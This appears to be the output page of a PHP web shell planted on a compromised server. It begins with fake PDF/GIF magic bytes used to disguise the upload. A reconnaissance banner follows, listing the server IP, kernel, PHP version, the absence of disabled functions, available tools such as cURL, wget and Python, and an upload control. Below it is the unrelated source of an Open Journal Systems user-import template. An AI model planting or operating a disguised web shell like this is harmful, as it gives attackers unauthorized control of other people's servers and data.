%PDF-1.7 GIF89;
| Server IP : 104.20.45.2 / Your IP : 172.16.20.3 Web Server : Apache/2.4.25 (Debian) System : Linux f64a392e70de 5.4.0-216-generic #236-Ubuntu SMP Fri Apr 11 19:53:21 UTC 2025 x86_64 User : application ( 1000) PHP Version : 5.6.40 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /app/plugins/importexport/users/ |
Upload File : |
{**
* plugins/importexport/users/importUsersResults.tpl
*
* Copyright (c) 2013-2019 Simon Fraser University
* Copyright (c) 2003-2019 John Willinsky
* Distributed under the GNU GPL v2. For full terms see the file docs/COPYING.
*
* Show the results of importing users.
*
*}
{strip}
{assign var="pageTitle" value="plugins.importexport.users.import.importUsers"}
{include file="common/header.tpl"}
{/strip}
<div id="importUsersResults">
{translate key="plugins.importexport.users.import.usersWereImported"}:
<table width="100%" class="listing">
<tr>
<td colspan="4" class="headseparator"> </td>
</tr>
<tr class="heading" valign="bottom">
<td width="15%">{translate key="user.username"}</td>
<td width="25%">{translate key="user.name"}</td>
<td width="30%">{translate key="user.email"}</td>
<td width="30%" align="right">{translate key="common.action"}</td>
</tr>
<tr>
<td colspan="4" class="headseparator"> </td>
</tr>
{foreach name=importedUsers from=$importedUsers item=user}
<tr valign="top">
<td><a href="{url page="manager" op="userProfile" path=$user->getId()}">{$user->getUsername()|escape}</a></td>
<td>{$user->getFullName()|escape}</td>
<td>{$user->getEmail()|escape}</td>
<td align="right" class="nowrap">
<a href="{url page="manager" op="editUser" path=$user->getId()}" class="action">{translate key="common.edit"}</a> | <a href="{url page="login" op="signInAsUser" path=$user->getId()}" class="action">{translate key="manager.people.signInAs"}</a>
</td>
</tr>
<tr>
<td colspan="4" class="{if $smarty.foreach.importedUsers.last}end{/if}separator"> </td>
</tr>
{foreachelse}
<tr>
<td colspan="4" class="nodata">{translate key="manager.people.noneEnrolled"}</td>
</tr>
<tr>
<td colspan="4" class="endseparator"> </td>
</tr>
{/foreach}
</table>
{if $isError}
<p>
<span class="formError">{translate key="plugins.importexport.users.import.errorsOccurred"}:</span>
<ul class="formErrorList">
{foreach key=field item=message from=$errors}
<li>{$message}</li>
{/foreach}
</ul>
</p>
{/if}
<p><a href="{url page="manager"}">{translate key="manager.journalManagement"}</a></p>
</div>
{include file="common/footer.tpl"}